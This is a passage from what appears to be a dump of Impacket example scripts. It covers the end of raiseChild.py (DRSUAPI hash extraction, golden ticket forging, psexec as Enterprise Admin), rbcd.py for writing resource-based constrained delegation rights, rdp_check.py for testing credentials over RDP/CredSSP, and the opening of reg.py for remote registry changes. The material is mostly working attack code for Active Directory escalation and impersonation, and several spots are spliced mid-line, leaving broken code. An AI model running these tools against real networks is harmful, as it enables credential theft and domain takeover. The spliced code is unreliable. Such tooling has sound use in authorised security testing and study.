b''.join(attr['AttrVal']['pAVal'][0]['pVal'])\n plainText = drsuapi.DecryptAttributeValue(self.__drsr, blob)\n if len(plainText) < 24:\n plainText = None\n\n if plainText:\n try:\n userProperties = samr.USER_PROPERTIES(plainText)\n except:\n # On some old w2k3 there might be user properties that don't\n # match [MS-SAMR] structure, discarding them\n return\n propertiesData = userProperties['UserProperties']\n for propertyCount in range(userProperties['PropertyCount']):\n userProperty = samr.USER_PROPERTY(propertiesData)\n propertiesData = propertiesData[len(userProperty):]\n if userProperty['PropertyName'].decode('utf-16le') == 'Primary:Kerberos-Newer-Keys':\n propertyValueBuffer = unhexlify(userProperty['PropertyValue'])\n kerbStoredCredentialNew = samr.KERB_STORED_CREDENTIAL_NEW(propertyValueBuffer)\n data = kerbStoredCredentialNew['Buffer']\n for credential in range(kerbStoredCredentialNew['CredentialCount']):\n keyDataNew = samr.KERB_KEY_DATA_NEW(data)\n data = data[len(keyDataNew):]\n keyValue = propertyValueBuffer[keyDataNew['KeyOffset']:][:keyDataNew['KeyLength']]\n\n if keyDataNew['KeyType'] in self.KERBEROS_TYPE:\n # Give me only the AES256\n if keyDataNew['KeyType'] == 18:\n return hexlify(keyValue)\n\n return None\n\n def __decryptHash(self, record, prefixTable=None):\n logging.debug('Decrypting hash for user: %s' % record['pmsgOut']['V6']['pNC']['StringName'][:-1])\n rid = 0\n LMHash = None\n NTHash = None\n for attr in record['pmsgOut']['V6']['pObjects']['Entinf']['AttrBlock']['pAttr']:\n try:\n attId = drsuapi.OidFromAttid(prefixTable, attr['attrTyp'])\n LOOKUP_TABLE = self.ATTRTYP_TO_ATTID\n except Exception as e:\n logging.debug('Failed to execute OidFromAttid with error %s, fallbacking to fixed table' % e)\n # Fallbacking to fixed table and hope for the best\n attId = attr['attrTyp']\n LOOKUP_TABLE = self.NAME_TO_ATTRTYP\n if attId == LOOKUP_TABLE['dBCSPwd']:\n if attr['AttrVal']['valCount'] > 0:\n encrypteddBCSPwd = ''.join(attr['AttrVal']['pAVal'][0]['pVal'])\n encryptedLMHash = drsuapi.DecryptAttributeValue(self.__drsr, encrypteddBCSPwd)\n else:\n LMHash = LMOWFv1('', '')\n elif attId == LOOKUP_TABLE['unicodePwd']:\n if attr['AttrVal']['valCount'] > 0:\n encryptedUnicodePwd = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])\n encryptedNTHash = drsuapi.DecryptAttributeValue(self.__drsr, encryptedUnicodePwd)\n else:\n NTHash = NTOWFv1('', '')\n elif attId == LOOKUP_TABLE['objectSid']:\n if attr['AttrVal']['valCount'] > 0:\n objectSid = b''.join(attr['AttrVal']['pAVal'][0]['pVal'])\n rid = unpack(' file')\n #parser.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller (needed to get the user''s SID). If omitted it will use the domain part (FQDN) specified in the target parameter')\n parser.add_argument('-target-exec', action='store',metavar = \"target address\", help='Target host you want to PSEXEC '\n 'against once the main attack finished')\n parser.add_argument('-targetRID', action='store', metavar = \"RID\", default='500', help='Target user RID you want to '\n 'dump credentials. Administrator (500) by default.')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n if len(sys.argv)==1:\n parser.print_help()\n print(\"\\nExamples: \")\n print(\"\\tpython raiseChild.py childDomain.net/adminuser\\n\")\n print(\"\\tthe password will be asked, or\\n\")\n print(\"\\tpython raiseChild.py childDomain.net/adminuser:mypwd\\n\")\n print(\"\\tor if you just have the hashes\\n\")\n print(\"\\tpython raiseChild.py -hashes LMHASH:NTHASH childDomain.net/adminuser\\n\")\n\n print(\"\\tThis will perform the attack and then psexec against target-exec as Enterprise Admin\")\n print(\"\\tpython raiseChild.py -target-exec targetHost childDomainn.net/adminuser\\n\")\n print(\"\\tThis will perform the attack and then psexec against target-exec as User with RID 1101\")\n print(\"\\tpython raiseChild.py -target-exec targetHost -targetRID 1101 childDomainn.net/adminuser\\n\")\n print(\"\\tThis will save the final goldenTicket generated in the ccache target file\")\n print(\"\\tpython raiseChild.py -w ccache childDomain.net/adminuser\\n\")\n sys.exit(1)\n \n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, _, _, options.k = parse_identity(options.target, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n commands = 'cmd.exe'\n\n try:\n pacifier = RAISECHILD(options.target_exec, username, password, domain, options, commands)\n pacifier.exploit()\n except SessionError as e:\n logging.critical(str(e))\n if e.getErrorCode() == STATUS_NO_LOGON_SERVERS:\n logging.info('Try using Kerberos authentication (-k switch). That might help solving the STATUS_NO_LOGON_SERVERS issue')\n except Exception as e:\n logging.debug('Exception:', exc_info=True)\n logging.critical(str(e))\n if hasattr(e, 'error_code'):\n if e.error_code == 0xc0000073:\n logging.info(\"Account not found in domain. (RID:%s)\" % options.targetRID)\n" }, { "path": "examples/rbcd.py", "content": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Python script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer\n#\n# Authors:\n# Remi Gascou (@podalirius_)\n# Charlie Bromberg (@_nwodtuhs)\n#\n# ToDo:\n# [ ]: allow users to set a ((-delegate-from-sid or -delegate-from-dn) and -delegate-to-dn) in order to skip ldapdomaindump and explicitely set the SID/DN\n\nimport argparse\nimport logging\nimport sys\nimport traceback\nimport ldap3\nimport ldapdomaindump\nfrom ldap3.protocol.formatters.formatters import format_sid\n\nfrom impacket import version\nfrom impacket.examples import logger, utils\nfrom impacket.ldap import ldaptypes\nfrom ldap3.utils.conv import escape_filter_chars\n\nfrom impacket.examples.utils import init_ldap_session, parse_identity\n\ndef create_empty_sd():\n sd = ldaptypes.SR_SECURITY_DESCRIPTOR()\n sd['Revision'] = b'\\x01'\n sd['Sbz1'] = b'\\x00'\n sd['Control'] = 32772\n sd['OwnerSid'] = ldaptypes.LDAP_SID()\n # BUILTIN\\Administrators\n sd['OwnerSid'].fromCanonical('S-1-5-32-544')\n sd['GroupSid'] = b''\n sd['Sacl'] = b''\n acl = ldaptypes.ACL()\n acl['AclRevision'] = 4\n acl['Sbz1'] = 0\n acl['Sbz2'] = 0\n acl.aces = []\n sd['Dacl'] = acl\n return sd\n\n\n# Create an ALLOW ACE with the specified sid\ndef create_allow_ace(sid):\n nace = ldaptypes.ACE()\n nace['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE\n nace['AceFlags'] = 0x00\n acedata = ldaptypes.ACCESS_ALLOWED_ACE()\n acedata['Mask'] = ldaptypes.ACCESS_MASK()\n acedata['Mask']['Mask'] = 983551 # Full control\n acedata['Sid'] = ldaptypes.LDAP_SID()\n acedata['Sid'].fromCanonical(sid)\n nace['Ace'] = acedata\n return nace\n\n\nclass RBCD(object):\n \"\"\"docstring for setrbcd\"\"\"\n\n def __init__(self, ldap_server, ldap_session, delegate_to):\n super(RBCD, self).__init__()\n self.ldap_server = ldap_server\n self.ldap_session = ldap_session\n self.delegate_from = None\n self.delegate_to = delegate_to\n self.SID_delegate_from = None\n self.DN_delegate_to = None\n logging.debug('Initializing domainDumper()')\n cnf = ldapdomaindump.domainDumpConfig()\n cnf.basepath = None\n self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf)\n\n def read(self):\n # Get target computer DN\n result = self.get_user_info(self.delegate_to)\n if not result:\n logging.error('Account to modify does not exist! (forgot \"$\" for a computer account? wrong domain?)')\n return\n self.DN_delegate_to = result[0]\n\n # Get list of allowed to act\n self.get_allowed_to_act()\n\n return\n\n def write(self, delegate_from):\n self.delegate_from = delegate_from\n\n # Get escalate user sid\n result = self.get_user_info(self.delegate_from)\n if not result:\n logging.error('Account to escalate does not exist! (forgot \"$\" for a computer account? wrong domain?)')\n return\n self.SID_delegate_from = str(result[1])\n\n # Get target computer DN\n result = self.get_user_info(self.delegate_to)\n if not result:\n logging.error('Account to modify does not exist! (forgot \"$\" for a computer account? wrong domain?)')\n return\n self.DN_delegate_to = result[0]\n\n # Get list of allowed to act and build security descriptor including previous data\n sd, targetuser = self.get_allowed_to_act()\n\n # writing only if SID not already in list\n if self.SID_delegate_from not in [ ace['Ace']['Sid'].formatCanonical() for ace in sd['Dacl'].aces ]:\n sd['Dacl'].aces.append(create_allow_ace(self.SID_delegate_from))\n self.ldap_session.modify(targetuser['dn'],\n {'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE,\n [sd.getData()]]})\n if self.ldap_session.result['result'] == 0:\n logging.info('Delegation rights modified successfully!')\n logging.info('%s can now impersonate users on %s via S4U2Proxy', self.delegate_from, self.delegate_to)\n else:\n if self.ldap_session.result['result'] == 50:\n logging.error('Could not modify object, the server reports insufficient rights: %s',\n self.ldap_session.result['message'])\n elif self.ldap_session.result['result'] == 19:\n logging.error('Could not modify object, the server reports a constrained violation: %s',\n self.ldap_session.result['message'])\n else:\n logging.error('The server returned an error: %s', self.ldap_session.result['message'])\n else:\n logging.info('%s can already impersonate users on %s via S4U2Proxy', self.delegate_from, self.delegate_to)\n logging.info('Not modifying the delegation rights.')\n # Get list of allowed to act\n self.get_allowed_to_act()\n return\n\n def remove(self, delegate_from):\n self.delegate_from = delegate_from\n\n # Get escalate user sid\n result = self.get_user_info(self.delegate_from)\n if not result:\n logging.error('Account to escalate does not exist! (forgot \"$\" for a computer account? wrong domain?)')\n return\n self.SID_delegate_from = str(result[1])\n\n # Get target computer DN\n result = self.get_user_info(self.delegate_to)\n if not result:\n logging.error('Account to modify does not exist! (forgot \"$\" for a computer account? wrong domain?)')\n return\n self.DN_delegate_to = result[0]\n\n # Get list of allowed to act and build security descriptor including that data\n sd, targetuser = self.get_allowed_to_act()\n\n # Remove the entries where SID match the given -delegate-from\n sd['Dacl'].aces = [ace for ace in sd['Dacl'].aces if self.SID_delegate_from != ace['Ace']['Sid'].formatCanonical()]\n self.ldap_session.modify(targetuser['dn'],\n {'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, [sd.getData()]]})\n\n if self.ldap_session.result['result'] == 0:\n logging.info('Delegation rights modified successfully!')\n else:\n if self.ldap_session.result['result'] == 50:\n logging.error('Could not modify object, the server reports insufficient rights: %s',\n self.ldap_session.result['message'])\n elif self.ldap_session.result['result'] == 19:\n logging.error('Could not modify object, the server reports a constrained violation: %s',\n self.ldap_session.result['message'])\n else:\n logging.error('The server returned an error: %s', self.ldap_session.result['message'])\n # Get list of allowed to act\n self.get_allowed_to_act()\n return\n\n def flush(self):\n # Get target computer DN\n result = self.get_user_info(self.delegate_to)\n if not result:\n logging.error('Account to modify does not exist! (forgot \"$\" for a computer account? wrong domain?)')\n return\n self.DN_delegate_to = result[0]\n\n # Get list of allowed to act\n sd, targetuser = self.get_allowed_to_act()\n\n self.ldap_session.modify(targetuser['dn'], {'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, []]})\n if self.ldap_session.result['result'] == 0:\n logging.info('Delegation rights flushed successfully!')\n else:\n if self.ldap_session.result['result'] == 50:\n logging.error('Could not modify object, the server reports insufficient rights: %s',\n self.ldap_session.result['message'])\n elif self.ldap_session.result['result'] == 19:\n logging.error('Could not modify object, the server reports a constrained violation: %s',\n self.ldap_session.result['message'])\n else:\n logging.error('The server returned an error: %s', self.ldap_session.result['message'])\n # Get list of allowed to act\n self.get_allowed_to_act()\n return\n\n def get_allowed_to_act(self):\n # Get target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute\n self.ldap_session.search(self.DN_delegate_to, '(objectClass=*)', search_scope=ldap3.BASE,\n attributes=['SAMAccountName', 'objectSid', 'msDS-AllowedToActOnBehalfOfOtherIdentity'])\n targetuser = None\n for entry in self.ldap_session.response:\n if entry['type'] != 'searchResEntry':\n continue\n targetuser = entry\n if not targetuser:\n logging.error('Could not query target user properties')\n return\n\n try:\n sd = ldaptypes.SR_SECURITY_DESCRIPTOR(\n data=targetuser['raw_attributes']['msDS-AllowedToActOnBehalfOfOtherIdentity'][0])\n if len(sd['Dacl'].aces) > 0:\n logging.info('Accounts allowed to act on behalf of other identity:')\n for ace in sd['Dacl'].aces:\n SID = ace['Ace']['Sid'].formatCanonical()\n SidInfos = self.get_sid_info(ace['Ace']['Sid'].formatCanonical())\n if SidInfos:\n SamAccountName = SidInfos[1]\n logging.info(' %-10s (%s)' % (SamAccountName, SID))\n else:\n logging.info('Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty')\n except IndexError:\n logging.info('Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty')\n # Create DACL manually\n sd = create_empty_sd()\n return sd, targetuser\n\n def get_user_info(self, samname):\n self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid'])\n try:\n dn = self.ldap_session.entries[0].entry_dn\n sid = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0])\n return dn, sid\n except IndexError:\n logging.error('User not found in LDAP: %s' % samname)\n return False\n\n def get_sid_info(self, sid):\n self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % escape_filter_chars(sid), attributes=['samaccountname'])\n try:\n dn = self.ldap_session.entries[0].entry_dn\n samname = self.ldap_session.entries[0]['samaccountname']\n return dn, samname\n except IndexError:\n logging.error('SID not found in LDAP: %s' % sid)\n return False\n\ndef parse_args():\n parser = argparse.ArgumentParser(add_help=True,\n description='Python (re)setter for property msDS-AllowedToActOnBehalfOfOtherIdentity for Kerberos RBCD attacks.')\n parser.add_argument('identity', action='store', help='domain.local/username[:password]')\n parser.add_argument(\"-delegate-to\", type=str, required=True,\n help=\"Target account the DACL is to be read/edited/etc.\")\n parser.add_argument(\"-delegate-from\", type=str, required=False,\n help=\"Attacker controlled account to write on the rbcd property of -delegate-to (only when using `-action write`)\")\n parser.add_argument('-action', choices=['read', 'write', 'remove', 'flush'], nargs='?', default='read',\n help='Action to operate on msDS-AllowedToActOnBehalfOfOtherIdentity')\n\n parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP')\n\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\",\n help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials '\n 'cannot be found, it will use the ones specified in the command '\n 'line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n\n group = parser.add_argument_group('connection')\n\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\",\n help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If '\n 'omitted it will use the domain part (FQDN) specified in '\n 'the identity parameter')\n group.add_argument('-dc-host', action='store', metavar=\"hostname\", help='Hostname of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted, -dc-ip will be used')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser.parse_args()\n\n\ndef main():\n print(version.BANNER)\n args = parse_args()\n logger.init(args.ts, args.debug)\n\n if args.action == 'write' and args.delegate_from is None:\n logging.critical('`-delegate-from` should be specified when using `-action write` !')\n sys.exit(1)\n\n domain, username, password, lmhash, nthash, args.k = parse_identity(args.identity, args.hashes, args.no_pass, args.aesKey, args.k)\n\n try:\n ldap_server, ldap_session = init_ldap_session(domain, username, password, lmhash, nthash, args.k, args.dc_ip, args.dc_host, args.aesKey, args.use_ldaps)\n rbcd = RBCD(ldap_server, ldap_session, args.delegate_to)\n if args.action == 'read':\n rbcd.read()\n elif args.action == 'write':\n rbcd.write(args.delegate_from)\n elif args.action == 'remove':\n rbcd.remove(args.delegate_from)\n elif args.action == 'flush':\n rbcd.flush()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n traceback.print_exc()\n logging.error(str(e))\n\n\nif __name__ == '__main__':\n main()\n" }, { "path": "examples/rdp_check.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# [MS-RDPBCGR] and [MS-CREDSSP] partial implementation\n# just to reach CredSSP auth. This example test whether\n# an account is valid on the target host.\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n# ToDo:\n# [x] Manage to grab the server's SSL key so we can finalize the whole\n# authentication process (check [MS-CSSP] section 3.1.5)\n#\n\nfrom struct import pack, unpack\n\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target, get_connected_socket\nfrom impacket.structure import Structure\nfrom impacket.spnego import GSSAPI, ASN1_SEQUENCE, ASN1_OCTET_STRING, asn1decode, asn1encode\n\nTDPU_CONNECTION_REQUEST = 0xe0\nTPDU_CONNECTION_CONFIRM = 0xd0\nTDPU_DATA = 0xf0\nTPDU_REJECT = 0x50\nTPDU_DATA_ACK = 0x60\n\n# RDP_NEG_REQ constants\nTYPE_RDP_NEG_REQ = 1\nPROTOCOL_RDP = 0\nPROTOCOL_SSL = 1\nPROTOCOL_HYBRID = 2\n\n# RDP_NEG_RSP constants\nTYPE_RDP_NEG_RSP = 2\nEXTENDED_CLIENT_DATA_SUPPORTED = 1\nDYNVC_GFX_PROTOCOL_SUPPORTED = 2\n\n# RDP_NEG_FAILURE constants\nTYPE_RDP_NEG_FAILURE = 3\nSSL_REQUIRED_BY_SERVER = 1\nSSL_NOT_ALLOWED_BY_SERVER = 2\nSSL_CERT_NOT_ON_SERVER = 3\nINCONSISTENT_FLAGS = 4\nHYBRID_REQUIRED_BY_SERVER = 5\nSSL_WITH_USER_AUTH_REQUIRED_BY_SERVER = 6\n\nclass TPKT(Structure):\n commonHdr = (\n ('Version','B=3'),\n ('Reserved','B=0'),\n ('Length','>H=len(TPDU)+4'),\n ('_TPDU','_-TPDU','self[\"Length\"]-4'),\n ('TPDU',':=\"\"'),\n )\n\nclass TPDU(Structure):\n commonHdr = (\n ('LengthIndicator','B=len(VariablePart)+1'),\n ('Code','B=0'),\n ('VariablePart',':=\"\"'),\n )\n\n def __init__(self, data = None):\n Structure.__init__(self,data)\n self['VariablePart']=''\n\nclass CR_TPDU(Structure):\n commonHdr = (\n ('DST-REF','\n #\n # Note During this phase of the protocol, the OPTIONAL authInfo field is omitted \n # from the TSRequest structure by the client and server; the OPTIONAL pubKeyAuth \n # field is omitted by the client unless the client is sending the last SPNEGO token. \n # If the client is sending the last SPNEGO token, the TSRequest structure MUST have \n # both the negoToken and the pubKeyAuth fields filled in.\n\n # NTLMSSP stuff\n auth = ntlm.getNTLMSSPType1('','',True, use_ntlmv2 = True)\n\n ts_request = TSRequest()\n ts_request['NegoData'] = auth.getData()\n\n tls.send(ts_request.getData())\n buff = tls.recv(4096)\n ts_request.fromString(buff)\n\n # 3. The client encrypts the public key it received from the server (contained \n # in the X.509 certificate) in the TLS handshake from step 1, by using the \n # confidentiality support of SPNEGO. The public key that is encrypted is the \n # ASN.1-encoded SubjectPublicKey sub-field of SubjectPublicKeyInfo from the X.509 \n # certificate, as specified in [RFC3280] section 4.1. The encrypted key is \n # encapsulated in the pubKeyAuth field of the TSRequest structure and is sent over \n # the TLS channel to the server. \n #\n # Note During this phase of the protocol, the OPTIONAL authInfo field is omitted \n # from the TSRequest structure; the client MUST send its last SPNEGO token to the \n # server in the negoTokens field (see step 2) along with the encrypted public key \n # in the pubKeyAuth field.\n\n # Last SPNEGO token calculation\n #ntlmChallenge = ntlm.NTLMAuthChallenge(ts_request['NegoData'])\n type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, ts_request['NegoData'], username, password, domain, lmhash, nthash, use_ntlmv2 = True)\n\n # Get server public key\n server_cert = tls.get_peer_certificate()\n pkey = server_cert.get_pubkey()\n dump = crypto.dump_publickey(crypto.FILETYPE_ASN1, pkey)\n # Parsing the key from ASN1 encoded\n dump = dump[24:]\n\n cipher = SPNEGOCipher(type3['flags'], exportedSessionKey)\n signature, cripted_key = cipher.encrypt(dump)\n ts_request['NegoData'] = type3.getData()\n ts_request['pubKeyAuth'] = signature.getData() + cripted_key\n\n try:\n # Sending the Type 3 NTLM blob\n tls.send(ts_request.getData())\n # The other end is waiting for the pubKeyAuth field, but looks like it's\n # not needed to check whether authentication worked.\n # If auth is unsuccessful, it throws an exception with the previous send().\n # If auth is successful, the server waits for the pubKeyAuth and doesn't answer \n # anything. So, I'm sending garbage so the server returns an error. \n # Luckily, it's a different error so we can determine whether or not auth worked ;)\n buff = tls.recv(1024)\n except Exception as err:\n if str(err).find(\"denied\") > 0:\n logging.error(\"Access Denied\")\n else:\n logging.error(err)\n return\n\n # 4. After the server receives the public key in step 3, it first verifies that \n # it has the same public key that it used as part of the TLS handshake in step 1. \n # The server then adds 1 to the first byte representing the public key (the ASN.1 \n # structure corresponding to the SubjectPublicKey field, as described in step 3) \n # and encrypts the binary result by using the SPNEGO encryption services. \n # Due to the addition of 1 to the binary data, and encryption of the data as a binary \n # structure, the resulting value may not be valid ASN.1-encoded values. \n # The encrypted binary data is encapsulated in the pubKeyAuth field of the TSRequest \n # structure and is sent over the encrypted TLS channel to the client. \n # The addition of 1 to the first byte of the public key is performed so that the \n # client-generated pubKeyAuth message cannot be replayed back to the client by an \n # attacker.\n #\n # Note During this phase of the protocol, the OPTIONAL authInfo and negoTokens \n # fields are omitted from the TSRequest structure.\n\n ts_request = TSRequest(buff)\n\n # Now we're decrypting the certificate + 1 sent by the server. Not worth checking ;)\n signature, plain_text = cipher.decrypt(ts_request['pubKeyAuth'][16:])\n\n # 5. After the client successfully verifies server authenticity by performing a \n # binary comparison of the data from step 4 to that of the data representing \n # the public key from the server's X.509 certificate (as specified in [RFC3280], \n # section 4.1), it encrypts the user's credentials (either password or smart card \n # PIN) by using the SPNEGO encryption services. The resulting value is \n # encapsulated in the authInfo field of the TSRequest structure and sent over \n # the encrypted TLS channel to the server.\n # The TSCredentials structure within the authInfo field of the TSRequest \n # structure MAY contain either a TSPasswordCreds or a TSSmartCardCreds structure, \n # but MUST NOT contain both.\n #\n # Note During this phase of the protocol, the OPTIONAL pubKeyAuth and negoTokens \n # fields are omitted from the TSRequest structure.\n tsp = TSPasswordCreds()\n tsp['domainName'] = domain\n tsp['userName'] = username\n tsp['password'] = password\n tsc = TSCredentials()\n tsc['credType'] = 1 # TSPasswordCreds\n tsc['credentials'] = tsp.getData()\n\n signature, cripted_creds = cipher.encrypt(tsc.getData())\n ts_request = TSRequest()\n ts_request['authInfo'] = signature.getData() + cripted_creds\n tls.send(ts_request.getData())\n tls.close()\n logging.info(\"Access Granted\")\n\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"Test whether an account is valid on the target \"\n \"host using the RDP protocol.\")\n\n parser.add_argument('target', action='store', help='[[domain/]username[:password]@]')\n parser.add_argument('-6','--ipv6', action='store_true', help='Test on IPv6')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n \n options = parser.parse_args()\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, address = parse_target(options.target)\n\n if domain is None:\n domain = ''\n\n if password == '' and username != '' and options.hashes is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n\n check_rdp(address, username, password, domain, options.hashes, options.ipv6)\n" }, { "path": "examples/reg.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Remote registry manipulation tool.\n# The idea is to provide similar functionality as the REG.EXE Windows utility.\n#\n# e.g:\n# ./reg.py Administrator:password@targetMachine query -keyName HKLM\\\\Software\\\\Microsoft\\\\WBEM -s\n# ./reg.py Administrator:password@targetMachine add -keyName HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa -v DisableRestrictedAdmin -vt REG_DWORD -vd 1\n# ./reg.py Administrator:password@targetMachine add -keyName HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\NewService\n# ./reg.py Administrator:password@targetMachine add -keyName HKCR\\\\hlpfile\\\\DefaultIcon -v '' -vd '\\\\SMBRelay\\share'\n# ./reg.py Administrator:password@targetMachine delete -keyName HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa -v DisableRestrictedAdmin\n#\n# Author:\n# Manuel Porto (@manuporto)\n# Alberto Solino (@agsolino)\n#\n# Reference for:\n# [MS-RRP]\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport codecs\nimport logging\nimport sys\nimport time\nimport binascii\nfrom struct import unpack\n\nfrom impacket import version\nfrom impacket.dcerpc.v5 import transport, rrp, scmr, rpcrt\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.system_errors import ERROR_NO_MORE_ITEMS\nfrom impacket.structure import hexdump\nfrom impacket.smbconnection import SMBConnection, SessionError\nfrom impacket.dcerpc.v5.dtypes import READ_CONTROL\n\n\nclass RemoteOperations:\n def __init__(self, smbConnection, doKerberos, kdcHost=None):\n self.__smbConnection = smbConnection\n self.__smbConnection.setTimeout(5 * 60)\n self.__serviceName = 'RemoteRegistry'\n self.__stringBindingWinReg = r'ncacn_np:445[\\pipe\\winreg]'\n self.__rrp = None\n self.__regHandle = None\n\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n\n self.__disabled = False\n self.__shouldStop = False\n self.__started = False\n\n self.__stringBindingSvcCtl = r'ncacn_np:445[\\pipe\\svcctl]'\n self.__scmr = None\n\n def getRRP(self):\n return self.__rrp\n\n def __connectSvcCtl(self):\n rpc = transport.DCERPCTransportFactory(self.__stringBindingSvcCtl)\n rpc.set_smb_connection(self.__smbConnection)\n self.__scmr = rpc.get_dce_rpc()\n self.__scmr.connect()\n self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n\n def connectWinReg(self):\n rpc = transport.DCERPCTransportFactory(self.__stringBindingWinReg)\n rpc.set_smb_connection(self.__smbConnection)\n self.__rrp = rpc.get_dce_rpc()\n self.__rrp.connect()\n self.__rrp.bind(rrp.MSRPC_UUID_RRP)\n\n def __checkServiceStatus(self):\n # Open SC Manager\n ans = scmr.hROpenSCManagerW(self.__scmr)\n self.__scManagerHandle = ans['lpScHandle']\n # Now let's open the service\n ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle, self.__serviceName)\n self.__serviceHandle = ans['lpServiceHandle']\n # Let's check its status\n ans = scmr.hRQueryServiceStatus(self.__scmr, self.__serviceHandle)\n if ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_STOPPED:\n logging.info('Service %s is in stopped state' % self.__serviceName)\n self.__shouldStop = True\n self.__started = False\n elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:\n logging.debug('Service %s is already running' % self.__serviceName)\n self.__shouldStop = False\n self.__started = True\n else:\n raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])\n\n # Let's check its configuration if service is stopped, maybe it's disabled :s\n if self.__started is False:\n ans = scmr.hRQueryServiceConfigW(self.__scmr, self.__serviceHandle)\n if ans['lpServiceConfig']['dwStartType'] == 0x4:\n logging.info('Service %s is disabled, enabling it' % self.__serviceName)\n self.__disabled = True\n scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType=0x3)\n logging.info('Starting service %s' % self.__serviceName)\n scmr.hRStartServiceW(self.__scmr, self.__serviceHandle)\n time.sleep(1)\n\n def enableRegistry(self):\n self.__connectSvcCtl()\n self.__checkServiceStatus()\n self.connectWinReg()\n\n def __restore(self):\n # First of all stop the service if it was originally stopped\n if self.__shouldStop is True:\n logging.info('Stopping service %s' % self.__serviceName)\n scmr.hRControlService(self.__scmr, self.__serviceHandle, scmr.SERVICE_CONTROL_STOP)\n if self.__disabled is True:\n logging.info('Restoring the disabled state for service %s' % self.__serviceName)\n scmr.hRChangeServiceConfigW(self.__scmr, self.__serviceHandle, dwStartType=0x4)\n\n def finish(self):\n self.__restore()\n if self.__rrp is not None:\n self.__rrp.disconnect()\n if self.__scmr is not None:\n self.__scmr.disconnect()\n\n\nclass RegHandler:\n def __init__(self, username, password, domain, options):\n 